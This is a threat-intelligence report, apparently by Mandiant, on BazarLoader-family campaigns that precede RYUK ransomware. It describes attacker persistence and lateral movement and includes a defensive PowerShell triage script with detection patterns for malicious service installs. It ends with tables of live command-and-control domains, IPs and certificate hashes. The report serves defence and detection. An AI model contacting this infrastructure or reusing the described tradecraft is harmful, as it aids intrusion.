CVSS v3.1: 10.0 Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Attack Vector: Network | Attack Complexity: Low | Privileges Required: None | User Interaction: None | Scope: Changed | Confidentiality Impact: High | Integrity Impact: High | Availability Impact: High

CVSS v2: 9.3 High
AV:N/AC:M/Au:N/C:C/I:C/A:C
Access Vector: Network | Access Complexity: Medium | Authentication: None | Confidentiality Impact: Complete | Integrity Impact: Complete | Availability Impact: Complete
Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise. Effective and fast detection of these campaigns is key to mitigating this threat.
The malware families enabling these attacks, previously reported by Mandiant to intelligence subscribers, include KEGTAP/BEERBOT, SINGLEMALT/STILLBOT and WINEKEY/CORKBOT. While these families communicate with the same command and control (C2) infrastructure and are close to functional parity, there is minimal code overlap between them. Other security researchers have tracked these families under the names BazarLoader and BazarBackdoor, or Team9.
The operators conducting these campaigns have actively targeted hospitals, retirement communities, and medical centers, even in the midst of a global health crisis, demonstrating a clear disregard for human life.
Campaigns distributing KEGTAP, SINGLEMALT and WINEKEY have been sent to individuals at organizations across a broad range of industries and geographies using a series of shifting delivery tactics, techniques and procedures (TTPs). Despite the frequent changes seen across these campaigns, the following has remained consistent across recent activity:
Despite this uniformity, the associated TTPs have otherwise changed regularly—both between campaigns and across multiple spam runs seen in the same day. Notable ways that these campaigns have varied over time include:
Figure 1: Email containing internal references to target an organization’s name
Figure 2: Google Docs PDF document containing a target organization’s logo
Hiding the final payload behind multiple links is a simple but effective way to bypass some email filtering technologies. Various products can follow the links in an email to identify malware or malicious domains, but the number of hops they follow varies. Embedding the links inside a PDF document makes automated link-following and detection harder still.
Given the possibility that accesses obtained from these campaigns may be provided to various operators to monetize, the latter-stage TTPs, including ransomware family deployed, may vary across intrusions. A notable majority of cases where Mandiant has had visibility into these post-compromise TTPs have been attributable to UNC1878, a financially motivated actor that monetizes network access via the deployment of RYUK ransomware.
Establish Foothold
Once the loader and backdoor have been executed on the initial victim host, the actors have used this initial backdoor to download POWERTRICK and/or Cobalt Strike BEACON payloads to establish a foothold. Notably, the respective loader and backdoor as well as POWERTRICK have typically been installed on a small number of hosts in observed incidents, suggesting these payloads may be reserved for establishing a foothold and performing initial network and host reconnaissance. However, BEACON is frequently found on a larger number of hosts and used throughout various stages of the attack lifecycle.
Maintain Presence
Beyond the preliminary phases of each intrusion, we have seen variations in how these attackers have maintained presence after establishing an initial foothold or moving laterally within a network. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot.
Escalate Privileges
The most commonly observed methods for escalating privileges in these incidents have involved the use of valid credentials. The actors used a variety of techniques for accessing credentials stored in memory or on disk to access privileged accounts.
Reconnaissance
The approaches taken to perform host and network reconnaissance across these incidents varied; however, a significant portion of observed reconnaissance activity has revolved around Active Directory enumeration using publicly available utilities such as BLOODHOUND, SHARPHOUND or ADFind, as well as the execution of PowerShell cmdlets through Cobalt Strike BEACON.
Lateral Movement
Lateral movement was most commonly accomplished using valid credentials in combination with Cobalt Strike BEACON, RDP and SMB, or using the same backdoors used to establish a foothold in victim networks.
Complete Mission
Mandiant is directly aware of incidents involving KEGTAP that included the post-compromise deployment of RYUK ransomware. We have also observed instances where ANCHOR infections, another backdoor associated with the same actors, preceded CONTI or MAZE deployment.
If an organization identifies a host with an active infection believed to be an instance of KEGTAP or a parallel malware family, the following containment actions are recommended. Note that due to the velocity of this intrusion activity, these actions should be taken in parallel.
An enterprise-wide effort should be made to identify host-based artifacts related to the execution of first-stage malware and all post-intrusion activity associated with this activity. Some baseline approaches to this have been captured as follows.
Activity associated with the KEGTAP loader can often be identified via a review of system startup folders and Userinit values under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon registry key.
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\adobe.lnk
Figure 3: Example LNK file associated with KEGTAP persistence within a system’s startup folders
SINGLEMALT uses BITS to persist across reboots and can often be identified by reviewing anomalous BITS jobs. It relies on a well-documented BITS persistence mechanism: the job is created to download a URL that does not exist, so the transfer fails; the job's notification command line, which BITS runs when the transfer errors out, relaunches the malware, and because the job retries on a regular interval the malware keeps being executed. To review BITS jobs on a host, run bitsadmin /list /allusers /verbose (without /allusers, only the jobs owned by the current user are shown).
WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware.
Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr
Value: Path to the backdoor
Figure 4: Example registry RUN key used by WINEKEY to maintain persistence
The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case.
Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\Windows\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\Windows\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static.
Post-exploitation activity associated with the deployment of ransomware following these campaigns is typically conducted using the Cobalt Strike attack framework. Its BEACON payload can often be identified by reviewing registered services and service creation events (System event log, Event ID 7045, written when a new service is installed), both markers of the mechanism it most commonly employs to maintain persistence.
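The following PowerShell script is an added example, not code from the original post or from Mandiant: it collects the host artifacts the preceding paragraphs describe (Winlogon Userinit, Startup-folder LNKs, Run keys, BITS jobs, scheduled tasks, SysWOW64 file names and 7045 service installs) into one findings list for an analyst to review. Run it elevated. The name patterns and the "newest 5% of SysWOW64" threshold are this example's own assumptions, as is the seven-character service-name check, which the post does not state.

```powershell
# Added example (not from the original post): one-host triage for the persistence
# artifacts described above. Every check is a heuristic for analyst review; the
# patterns and thresholds below are this example's assumptions.
$findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Check, [string]$Detail) {
    $findings.Add([pscustomobject]@{ Host = $env:COMPUTERNAME; Check = $Check; Detail = $Detail })
}

# KEGTAP: Userinit should be the stock value; anything appended after the comma is suspect.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$userinit = (Get-ItemProperty $winlogon -Name Userinit).Userinit
if ($userinit -notmatch '^C:\\Windows\\system32\\userinit\.exe,?$') { Add-Finding 'Winlogon Userinit' $userinit }

# KEGTAP: LNK files in every profile's Startup folder and the all-users folder,
# with each shortcut resolved so the analyst sees what actually runs.
$shell = New-Object -ComObject WScript.Shell
$startupDirs = @("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp") +
    (Get-ChildItem 'C:\Users' -Directory | ForEach-Object {
        Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' })
foreach ($dir in $startupDirs) {
    Get-ChildItem $dir -Filter *.lnk -ErrorAction SilentlyContinue | ForEach-Object {
        $lnk = $shell.CreateShortcut($_.FullName)
        Add-Finding 'Startup LNK' ('{0} -> {1} {2}' -f $_.FullName, $lnk.TargetPath, $lnk.Arguments)
    }
}

# WINEKEY: Run keys in HKLM and in every loaded user hive. HKCU only covers the
# account running this script, so walk HKEY_USERS instead.
New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS -ErrorAction SilentlyContinue | Out-Null
$runKeys = @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run') +
    (Get-ChildItem HKU:\ | ForEach-Object { "HKU:\$($_.PSChildName)\Software\Microsoft\Windows\CurrentVersion\Run" })
foreach ($key in $runKeys) {
    $props = Get-ItemProperty $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    $props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' } | ForEach-Object {
        Add-Finding 'Run key' ('{0}\{1} = {2}' -f $key, $_.Name, $_.Value)
    }
}

# SINGLEMALT: BITS jobs for every account (without /allusers only the caller's jobs
# are listed). A job carrying a notification command line, or one stuck in an error
# state retrying a dead URL, is the persistence pattern described above.
$job = ''
foreach ($line in (bitsadmin /list /allusers /verbose 2>$null)) {
    if ($line -match '^GUID:\s*(\{[^}]+\})\s+DISPLAY:\s*(.*)$') { $job = "$($Matches[1]) '$($Matches[2])'" }
    elseif ($line -match '^TYPE:.*STATE:\s*(\S*ERROR\S*)') { Add-Finding 'BITS job state' "$job $($Matches[1])" }
    elseif ($line -match '^NOTIFICATION COMMAND LINE:\s*(.+)$' -and $Matches[1] -notmatch '^none\s*$') {
        Add-Finding 'BITS notify cmdline' "$job $($Matches[1])"
    }
}

# ANCHOR: scheduled tasks with a blank name, or whose action runs an
# 8-lowercase-letter executable out of SysWOW64.
Get-ScheduledTask | ForEach-Object {
    $task = $_
    $task.Actions | Where-Object { $_.Execute } | ForEach-Object {
        if ($task.TaskName -match '^\s*$' -or $_.Execute -cmatch '\\SysWOW64\\[a-z]{8}\.exe"?$') {
            Add-Finding 'Scheduled task' ('[{0}] {1} {2}' -f $task.TaskName, $_.Execute, $_.Arguments)
        }
    }
}

# ANCHOR (low fidelity on its own): 8-lowercase-letter .exe files in SysWOW64.
# Many legitimate binaries fit the pattern, so only unsigned files or files newer
# than 95% of the directory (which is mostly static) are reported.
$exes = @(Get-ChildItem 'C:\Windows\SysWOW64' -Filter *.exe -File)
$sorted = @($exes.CreationTime | Sort-Object)
$cutoff = $sorted[[math]::Min($sorted.Count - 1, [int][math]::Floor($sorted.Count * 0.95))]
$exes | Where-Object { $_.Name -cmatch '^[a-z]{8}\.exe$' } | ForEach-Object {
    $sig = (Get-AuthenticodeSignature $_.FullName).Status
    if ($sig -ne 'Valid' -or $_.CreationTime -gt $cutoff) {
        Add-Finding 'SysWOW64 8-char exe' ('{0} created={1} signature={2}' -f $_.Name, $_.CreationTime, $sig)
    }
}

# BEACON: System log Event ID 7045 (new service installed). EventData fields are
# ServiceName, ImagePath, ServiceType, StartType, AccountName. Flag image paths that
# launch an interpreter or run from an admin share, and 7-character random-looking
# service names (an assumed pattern, not one the post states).
Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } -ErrorAction SilentlyContinue | ForEach-Object {
    $name = $_.Properties[0].Value; $image = $_.Properties[1].Value
    if ($image -match '(?i)powershell|rundll32|cmd\.exe|\\\\[^\\]+\\ADMIN\$' -or $name -match '^[A-Za-z0-9]{7}$') {
        Add-Finding 'Service install 7045' ('{0} name={1} image={2}' -f $_.TimeCreated, $name, $image)
    }
}

$findings | Format-Table -AutoSize -Wrap
```

Because the post notes that KEGTAP, SINGLEMALT and POWERTRICK tend to land on only a handful of hosts while BEACON spreads widely, the 7045 and Run-key sections are the ones worth pushing out enterprise-wide (for example through your EDR's script execution), while the Userinit, Startup and BITS checks are most useful on the initially compromised hosts. The Run-key walk deliberately reports every value rather than filtering, since the WINEKEY value name on the page ("Backup Mgr") is only one observed instance; stack the output across hosts and look for names and paths that appear on few machines.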
The following are additional strategies that may aid in identifying associated activity:
The actions taken by the actors to escalate privileges and move laterally in an environment use well-documented techniques that search the network and Active Directory for common misconfigurations that expose credentials and systems for abuse. Organizations can take steps to limit the impact and effectiveness of these techniques. For more in-depth recommendations see our ransomware protection white paper.
For more intelligence on ransomware and other threats, please register for Mandiant Advantage Free, a no-cost version of our threat intelligence platform. Check out this episode of State of the Hack for additional information on this threat.
Sample Email Subjects / Patterns
Example Malware Family MD5s
Code Signing Certificate CNs
A significant proportion of the post-compromise activity associated with these campaigns has involved the distribution of RYUK ransomware by a threat group tracked by Mandiant as UNC1878. As such, we are releasing indicators associated with this group.
BEACON C2s
| First Seen | Domain |
|---|---|
| 12/11/19 | updatemanagir[.]us |
| 12/20/19 | cmdupdatewin[.]com |
| 12/26/19 | scrservallinst[.]info |
| 1/10/20 | winsystemupdate[.]com |
| 1/11/20 | jomamba[.]best |
| 1/13/20 | updatewinlsass[.]com |
| 1/16/20 | winsysteminfo[.]com |
| 1/20/20 | livecheckpointsrs[.]com |
| 1/21/20 | ciscocheckapi[.]com |
| 1/28/20 | timesshifts[.]com |
| 1/29/20 | cylenceprotect[.]com |
| 1/30/20 | sophosdefence[.]com |
| 1/30/20 | taskshedulewin[.]com |
| 1/30/20 | windefenceinfo[.]com |
| 1/30/20 | lsasswininfo[.]com |
| 1/30/20 | update-wind[.]com |
| 1/30/20 | lsassupdate[.]com |
| 1/30/20 | renovatesystem[.]com |
| 1/31/20 | updatewinsoftr[.]com |
| 2/2/20 | cleardefencewin[.]com |
| 2/2/20 | checkwinupdate[.]com |
| 2/2/20 | havesetup[.]net |
| 2/3/20 | update-wins[.]com |
| 2/3/20 | conhostservice[.]com |
| 2/4/20 | microsoftupdateswin[.]com |
| 2/4/20 | iexploreservice[.]com |
| 2/12/20 | avrenew[.]com |
| 2/12/20 | target-support[.]online |
| 2/12/20 | web-analysis[.]live |
| 2/14/20 | freeallsafe[.]com |
| 2/17/20 | windefens[.]com |
| 2/17/20 | defenswin[.]com |
| 2/17/20 | easytus[.]com |
| 2/17/20 | greattus[.]com |
| 2/17/20 | livetus[.]com |
| 2/17/20 | comssite[.]com |
| 2/17/20 | findtus[.]com |
| 2/17/20 | bigtus[.]com |
| 2/17/20 | aaatus[.]com |
| 2/17/20 | besttus[.]com |
| 2/17/20 | firsttus[.]com |
| 2/17/20 | worldtus[.]com |
| 2/26/20 | freeoldsafe[.]com |
| 2/26/20 | serviceupdates[.]net |
| 2/26/20 | topserviceupdater[.]com |
| 2/27/20 | myserviceupdater[.]com |
| 2/29/20 | myservicebooster[.]net |
| 2/29/20 | servicesbooster[.]org |
| 2/29/20 | brainschampions[.]com |
| 2/29/20 | myservicebooster[.]com |
| 2/29/20 | topservicesbooster[.]com |
| 2/29/20 | servicesbooster[.]com |
| 2/29/20 | topservicesecurity[.]org |
| 2/29/20 | topservicesecurity[.]net |
| 2/29/20 | topsecurityservice[.]net |
| 2/29/20 | myyserviceupdater[.]com |
| 2/29/20 | topservicesupdate[.]com |
| 2/29/20 | topservicesecurity[.]com |
| 2/29/20 | servicesecurity[.]org |
| 2/29/20 | myserviceconnect[.]net |
| 3/2/20 | topservicesupdates[.]com |
| 3/2/20 | yoursuperservice[.]com |
| 3/2/20 | topservicehelper[.]com |
| 3/2/20 | serviceuphelper[.]com |
| 3/2/20 | serviceshelpers[.]com |
| 3/2/20 | boostsecuritys[.]com |
| 3/3/20 | hakunamatatata[.]com |
| 3/8/20 | service-updater[.]com |
| 3/9/20 | secondserviceupdater[.]com |
| 3/9/20 | twelvethserviceupdater[.]com |
| 3/9/20 | twentiethservicehelper[.]com |
| 3/9/20 | twelfthservicehelper[.]com |
| 3/9/20 | tenthservicehelper[.]com |
| 3/9/20 | thirdserviceupdater[.]com |
| 3/9/20 | thirdservicehelper[.]com |
| 3/9/20 | tenthserviceupdater[.]com |
| 3/9/20 | thirteenthservicehelper[.]com |
| 3/9/20 | seventeenthservicehelper[.]com |
| 3/9/20 | sixteenthservicehelper[.]com |
| 3/9/20 | sixthservicehelper[.]com |
| 3/9/20 | seventhservicehelper[.]com |
| 3/9/20 | seventhserviceupdater[.]com |
| 3/9/20 | sixthserviceupdater[.]com |
| 3/9/20 | secondservicehelper[.]com |
| 3/9/20 | ninthservicehelper[.]com |
| 3/9/20 | ninethserviceupdater[.]com |
| 3/9/20 | fourteenthservicehelper[.]com |
| 3/9/20 | fourthserviceupdater[.]com |
| 3/9/20 | firstserviceupdater[.]com |
| 3/9/20 | firstservisehelper[.]com |
| 3/9/20 | fifthserviceupdater[.]com |
| 3/9/20 | eleventhserviceupdater[.]com |
| 3/9/20 | fifthservicehelper[.]com |
| 3/9/20 | fourservicehelper[.]com |
| 3/9/20 | eighthservicehelper[.]com |
| 3/9/20 | eighteenthservicehelper[.]com |
| 3/9/20 | eighthserviceupdater[.]com |
| 3/9/20 | fifteenthservicehelper[.]com |
| 3/9/20 | nineteenthservicehelper[.]com |
| 3/9/20 | eleventhservicehelper[.]com |
| 3/14/20 | thirdservice-developer[.]com |
| 3/14/20 | fifthservice-developer[.]com |
| 3/15/20 | firstservice-developer[.]com |
| 3/16/20 | fourthservice-developer[.]com |
| 3/16/20 | ninethservice-developer[.]com |
| 3/16/20 | seventhservice-developer[.]com |
| 3/16/20 | secondservice-developer[.]com |
| 3/16/20 | sixthservice-developer[.]com |
| 3/16/20 | tenthservice-developer[.]com |
| 3/16/20 | eithtservice-developer[.]com |
| 3/17/20 | servicedupdater[.]com |
| 3/17/20 | service-updateer[.]com |
| 3/19/20 | sexyservicee[.]com |
| 3/19/20 | serviceboostnumberone[.]com |
| 3/19/20 | servicedbooster[.]com |
| 3/19/20 | service-hunter[.]com |
| 3/19/20 | servicedhunter[.]com |
| 3/19/20 | servicedpower[.]com |
| 3/19/20 | sexycservice[.]com |
| 3/23/20 | yourserviceupdater[.]com |
| 3/23/20 | top-serviceupdater[.]com |
| 3/23/20 | top-servicebooster[.]com |
| 3/23/20 | serviceshelps[.]com |
| 3/23/20 | servicemonsterr[.]com |
| 3/23/20 | servicehunterr[.]com |
| 3/23/20 | service-helpes[.]com |
| 3/23/20 | servicecheckerr[.]com |
| 3/23/20 | newservicehelper[.]com |
| 3/23/20 | huntersservice[.]com |
| 3/23/20 | helpforyourservice[.]com |
| 3/23/20 | boostyourservice[.]com |
| 3/26/20 | developmasters[.]com |
| 3/26/20 | actionshunter[.]com |
| 5/4/20 | info-develop[.]com |
| 5/4/20 | ayechecker[.]com |
| 5/4/20 | service-booster[.]com |
| 9/18/20 | zapored[.]com |
| 9/22/20 | gtrsqer[.]com |
| 9/22/20 | chalengges[.]com |
| 9/22/20 | caonimas[.]com |
| 9/22/20 | hakunaman[.]com |
| 9/22/20 | getinformationss[.]com |
| 9/22/20 | nomadfunclub[.]com |
| 9/22/20 | harddagger[.]com |
| 9/22/20 | errvghu[.]com |
| 9/22/20 | reginds[.]com |
| 9/22/20 | gameleaderr[.]com |
| 9/22/20 | razorses[.]com |
| 9/22/20 | vnuret[.]com |
| 9/22/20 | regbed[.]com |
| 9/22/20 | bouths[.]com |
| 9/23/20 | ayiyas[.]com |
| 9/23/20 | serviceswork[.]net |
| 9/23/20 | moonshardd[.]com |
| 9/23/20 | hurrypotter[.]com |
| 9/23/20 | biliyilish[.]com |
| 9/23/20 | blackhoall[.]com |
| 9/23/20 | checkhunterr[.]com |
| 9/23/20 | daggerclip[.]com |
| 9/23/20 | check4list[.]com |
| 9/24/20 | chainnss[.]com |
| 9/29/20 | hungrrybaby[.]com |
| 9/30/20 | martahzz[.]com |
| 10/1/20 | jonsonsbabyy[.]com |
| 10/1/20 | wondergodst[.]com |
| 10/1/20 | zetrexx[.]com |
| 10/1/20 | tiancaii[.]com |
| 10/1/20 | cantliee[.]com |
| 10/1/20 | realgamess[.]com |
| 10/1/20 | maybebaybe[.]com |
| 10/1/20 | saynoforbubble[.]com |
| 10/1/20 | chekingking[.]com |
| 10/1/20 | rapirasa[.]com |
| 10/1/20 | raidbossa[.]com |
| 10/1/20 | mountasd[.]com |
| 10/1/20 | puckhunterrr[.]com |
| 10/1/20 | pudgeee[.]com |
| 10/1/20 | loockfinderrs[.]com |
| 10/1/20 | lindasak[.]com |
| 10/1/20 | bithunterr[.]com |
| 10/1/20 | voiddas[.]com |
| 10/1/20 | sibalsakie[.]com |
| 10/1/20 | giveasees[.]com |
| 10/1/20 | shabihere[.]com |
| 10/1/20 | tarhungangster[.]com |
| 10/1/20 | imagodd[.]com |
| 10/1/20 | raaidboss[.]com |
| 10/1/20 | sunofgodd[.]com |
| 10/1/20 | rulemonster[.]com |
| 10/1/20 | loxliver[.]com |
| 10/1/20 | servicegungster[.]com |
| 10/1/20 | kungfupandasa[.]com |
| 10/2/20 | check1domains[.]com |
| 10/5/20 | sweetmonsterr[.]com |
| 10/5/20 | qascker[.]com |
| 10/7/20 | remotessa[.]com |
| 10/7/20 | cheapshhot[.]com |
| 10/7/20 | havemosts[.]com |
| 10/7/20 | unlockwsa[.]com |
| 10/7/20 | sobcase[.]com |
| 10/7/20 | zhameharden[.]com |
| 10/7/20 | mixunderax[.]com |
| 10/7/20 | bugsbunnyy[.]com |
| 10/7/20 | fastbloodhunter[.]com |
| 10/7/20 | serviceboosterr[.]com |
| 10/7/20 | servicewikii[.]com |
| 10/7/20 | secondlivve[.]com |
| 10/7/20 | quwasd[.]com |
| 10/7/20 | luckyhunterrs[.]com |
| 10/7/20 | wodemayaa[.]com |
| 10/7/20 | hybriqdjs[.]com |
| 10/7/20 | gunsdrag[.]com |
| 10/7/20 | gungameon[.]com |
| 10/7/20 | servicemount[.]com |
| 10/7/20 | servicesupdater[.]com |
| 10/7/20 | service-boosterr[.]com |
| 10/7/20 | serviceupdatter[.]com |
| 10/7/20 | dotmaingame[.]com |
| 10/12/20 | backup1service[.]com |
| 10/13/20 | bakcup-monster[.]com |
| 10/13/20 | bakcup-checker[.]com |
| 10/13/20 | backup-simple[.]com |
| 10/13/20 | backup-leader[.]com |
| 10/13/20 | backup-helper[.]com |
| 10/13/20 | service-checker[.]com |
| 10/13/20 | nasmastrservice[.]com |
| 10/14/20 | service-leader[.]com |
| 10/14/20 | nas-simple-helper[.]com |
| 10/14/20 | nas-leader[.]com |
| 10/14/20 | boost-servicess[.]com |
| 10/14/20 | elephantdrrive[.]com |
| 10/15/20 | service-hellper[.]com |
| 10/16/20 | top-backuphelper[.]com |
| 10/16/20 | best-nas[.]com |
| 10/16/20 | top-backupservice[.]com |
| 10/16/20 | bestservicehelper[.]com |
| 10/16/20 | backupnas1[.]com |
| 10/16/20 | backupmastter[.]com |
| 10/16/20 | best-backup[.]com |
| 10/17/20 | viewdrivers[.]com |
| 10/19/20 | topservicebooster[.]com |
| 10/19/20 | topservice-masters[.]com |
| 10/19/20 | topbackupintheworld[.]com |
| 10/19/20 | topbackup-helper[.]com |
| 10/19/20 | simple-backupbooster[.]com |
| 10/19/20 | top3-services[.]com |
| 10/19/20 | backup1services[.]com |
| 10/21/20 | backupmaster-service[.]com |
| 10/21/20 | backupmasterservice[.]com |
| 10/21/20 | service1updater[.]com |
| 10/21/20 | driverdwl[.]com |
| 10/21/20 | backup1master[.]com |
| 10/21/20 | boost-yourservice[.]com |
| 10/21/20 | checktodrivers[.]com |
| 10/21/20 | backup1helper[.]com |
| 10/21/20 | driver1updater[.]com |
| 10/21/20 | driver1master[.]com |
| 10/23/20 | view-backup[.]com |
| 10/23/20 | top3servicebooster[.]com |
| 10/23/20 | servicereader[.]com |
| 10/23/20 | servicehel[.]com |
| 10/23/20 | driver-boosters[.]com |
| 10/23/20 | service1update[.]com |
| 10/23/20 | service-hel[.]com |
| 10/23/20 | driver1downloads[.]com |
| 10/23/20 | service1view[.]com |
| 10/23/20 | backups1helper[.]com |
| 10/25/20 | idriveview[.]com |
| 10/26/20 | debug-service[.]com |
| 10/26/20 | idrivedwn[.]com |
| 10/28/20 | driverjumper[.]com |
| 10/28/20 | service1boost[.]com |
| 10/28/20 | idriveupdate[.]com |
| 10/28/20 | idrivehepler[.]com |
| 10/28/20 | idrivefinder[.]com |
| 10/28/20 | idrivecheck[.]com |
| 10/28/20 | idrivedownload[.]com |
| First Seen | Server | Subject | MD5 |
|---|---|---|---|
| 12/12/19 | 140.82.60.155:443 | CN=updatemanagir[.]us | ec16be328c09473d5e5c07310583d85a |
| 12/21/19 | 96.30.192.141:443 | CN=cmdupdatewin[.]com | 3d4de17df25412bb714fda069f6eb27e |
| 1/6/20 | 45.76.49.78:443 | CN=scrservallinst[.]info | cd6035bd51a44b597c1e181576dd44d9 |
| 1/8/20 | 149.248.58.11:443 | CN=updatewinlsass[.]com | 8c581979bd11138ffa3a25b895b97cc0 |
| 1/9/20 | 96.30.193.57:443 | CN=winsystemupdate[.]com | e4e732502b9658ea3380847c60b9e0fe |
| 1/14/20 | 95.179.219.169:443 | CN=jomamba[.]best | 80b7001e5a6e4bd6ec79515769b91c8b |
| 1/16/20 | 140.82.27.146:443 | CN=winsysteminfo[.]com | 29e656ba9d5d38a0c17a4f0dd855b37e |
| 1/19/20 | 45.32.170.9:443 | CN=livecheckpointsrs[.]com | 1de9e9aa8363751c8a71c43255557a97 |
| 1/20/20 | 207.148.8.61:443 | CN=ciscocheckapi[.]com | 97ca76ee9f02cfda2e8e9729f69bc208 |
| 1/28/20 | 209.222.108.106:443 | CN=timesshifts[.]com | 2bb464585f42180bddccb50c4a4208a5 |
| 1/29/20 | 31.7.59.141:443 | CN=updatewinsoftr[.]com | 07f9f766163c344b0522e4e917035fe1 |
| 1/29/20 | 79.124.60.117:443 | C=US | 9722acc9740d831317dd8c1f20d8cfbe |
| 1/29/20 | 66.42.86.61:443 | CN=lsassupdate[.]com | 3c9b3f1e12473a0fd28dc37071168870 |
| 1/29/20 | 45.76.20.140:443 | CN=cylenceprotect[.]com | da6ce63f4a52244c3dced32f7164038a |
| 1/29/20 | 45.76.20.140:80 | CN=cylenceprotect[.]com | da6ce63f4a52244c3dced32f7164038a |
| 1/30/20 | 149.248.5.240:443 | CN=sophosdefence[.]com | e9b4b649c97cdd895d6a0c56015f2e68 |
| 1/30/20 | 144.202.12.197:80 | CN=windefenceinfo[.]com | c6c63024b18f0c5828bd38d285e6aa58 |
| 1/30/20 | 149.248.5.240:80 | CN=sophosdefence[.]com | e9b4b649c97cdd895d6a0c56015f2e68 |
| 1/30/20 | 149.28.246.25:80 | CN=lsasswininfo[.]com | f9af8b7ddd4875224c7ce8aae8c1b9dd |
| 1/30/20 | 144.202.12.197:443 | CN=windefenceinfo[.]com | c6c63024b18f0c5828bd38d285e6aa58 |
| 1/30/20 | 149.28.246.25:443 | CN=lsasswininfo[.]com | f9af8b7ddd4875224c7ce8aae8c1b9dd |
| 1/30/20 | 45.77.119.212:443 | CN=taskshedulewin[.]com | e1dc7cecd3cb225b131bdb71df4b3079 |
| 1/30/20 | 45.77.119.212:80 | CN=taskshedulewin[.]com | e1dc7cecd3cb225b131bdb71df4b3079 |
| 1/30/20 | 149.28.122.130:443 | CN=renovatesystem[.]com | 734c26d93201cf0c918135915fdf96af |
| 1/30/20 | 45.32.170.9:80 | CN=livecheckpointsrs[.]com | 1de9e9aa8363751c8a71c43255557a97 |
| 1/30/20 | 149.248.58.11:80 | CN=updatewinlsass[.]com | 8c581979bd11138ffa3a25b895b97cc0 |
| 1/30/20 | 149.28.122.130:80 | CN=renovatesystem[.]com | 734c26d93201cf0c918135915fdf96af |
| 1/30/20 | 207.148.8.61:80 | CN=ciscocheckapi[.]com | 97ca76ee9f02cfda2e8e9729f69bc208 |
| 1/31/20 | 81.17.25.210:443 | CN=update-wind[.]com | 877bf6c685b68e6ddf23a4db3789fcaa |
| 1/31/20 | 31.7.59.141:80 | CN=updatewinsoftr[.]com | 07f9f766163c344b0522e4e917035fe1 |
| 2/2/20 | 155.138.214.247:80 | CN=cleardefencewin[.]com | 61df4864dc2970de6dcee65827cc9a54 |
| 2/2/20 | 155.138.214.247:443 | CN=cleardefencewin[.]com | 61df4864dc2970de6dcee65827cc9a54 |
| 2/2/20 | 45.76.231.195:443 | CN=checkwinupdate[.]com | d8e5dddeec1a9b366759c7ef624d3b8c |
| 2/2/20 | 45.76.231.195:80 | CN=checkwinupdate[.]com | d8e5dddeec1a9b366759c7ef624d3b8c |
| 2/3/20 | 46.19.142.154:443 | CN=havesetup[.]net | cd354c309f3229aff59751e329d8243a |
| 2/3/20 | 95.179.219.169:80 | CN=jomamba[.]best | 80b7001e5a6e4bd6ec79515769b91c8b |
| 2/3/20 | 140.82.60.155:80 | CN=updatemanagir[.]us | ec16be328c09473d5e5c07310583d85a |
| 2/3/20 | 209.222.108.106:80 | CN=timesshifts[.]com | 2bb464585f42180bddccb50c4a4208a5 |
| 2/3/20 | 66.42.118.123:443 | CN=conhostservice[.]com | 6c21d3c5f6e8601e92ae167a7cff721c |
| 2/4/20 | 80.240.18.106:443 | CN=microsoftupdateswin[.]com | 27cae092ad6fca89cd1b05ef1bb73e62 |
| 2/4/20 | 95.179.215.228:443 | CN=iexploreservice[.]com | 26010bebe046b3a33bacd805c2617610 |
| 2/12/20 | 155.138.216.133:443 | CN=defenswin[.]com | e5005ae0771fcc165772a154b7937e89 |
| 2/12/20 | 45.32.130.5:443 | CN=avrenew[.]com | f32ee1bb35102e5d98af81946726ec1b |
| 2/14/20 | 45.76.167.35:443 | CN=freeallsafe[.]com | 85f743a071a1d0b74d8e8322fecf832b |
| 2/14/20 | 45.63.95.187:443 | CN=easytus[.]com | 17de38c58e04242ee56a9f3a94e6fd53 |
| 2/17/20 | 45.77.89.31:443 | CN=besttus[.]com | 2bda8217bdb05642c995401af3b5c1f3 |
| 2/17/20 | 95.179.147.215:443 | CN=windefens[.]com | 57725c8db6b98a3361e0d905a697f9f8 |
| 2/17/20 | 155.138.216.133:443 | CN=defenswin[.]com | c07774a256fc19036f5c8c60ba418cbf |
| 2/17/20 | 104.238.190.126:443 | CN=aaatus[.]com | 4039af00ce7a5287a3e564918edb77cf |
| 2/17/20 | 144.202.83.4:443 | CN=greattus[.]com | 7f0fa9a608090634b42f5f17b8cecff0 |
| 2/17/20 | 104.156.245.0:443 | CN=comssite[.]com | f5bb98fafe428be6a8765e98683ab115 |
| 2/17/20 | 45.32.30.162:443 | CN=bigtus[.]com | 698fc23ae111381183d0b92fe343b28b |
| 2/17/20 | 108.61.242.184:443 | CN=livetus[.]com | 8bedba70f882c45f968c2d99b00a708a |
| 2/17/20 | 207.148.15.31:443 | CN=findtus[.]com | 15f07ca2f533f0954bbbc8d4c64f3262 |
